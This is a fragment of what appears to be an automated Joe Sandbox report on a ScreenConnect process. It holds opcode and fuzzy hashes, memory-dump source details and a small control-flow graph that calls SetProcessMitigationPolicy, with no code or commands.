                                                                                    • Opcode Fuzzy Hash: 9ca5776cdd36d1e609da6129967c792fa8d3b953376abf9f13b4f0c6909d7faa
                                                                                    • Instruction Fuzzy Hash: 9A317031E08A1C8FDB58EF98D849BE9B7F0FB68311F00826AD00DD7255DB74A945CB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 235 7ffd9b3f3aa2-7ffd9b3f80ef 237 7ffd9b3f80f6-7ffd9b3f8150 SetProcessMitigationPolicy 235->237 238 7ffd9b3f8158-7ffd9b3f8187 237->238 239 7ffd9b3f8152 237->239 239->238
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: MitigationPolicyProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1088084561-0
                                                                                    • Opcode ID: e12aacaf0da288f744449f21839d4962358dae2a278dcb9d34bcae50776e75dc
                                                                                    • Instruction ID: 4fc55a0a9e9c0969d5510ae8833378aba37b6e0245b92e2cd4ff045192e80365
                                                                                    • Opcode Fuzzy Hash: e12aacaf0da288f744449f21839d4962358dae2a278dcb9d34bcae50776e75dc
                                                                                    • Instruction Fuzzy Hash: 2821D731918B188FDB28AF9D984AAF97BE0EB65711F00423EE049D3251DB74B8458B91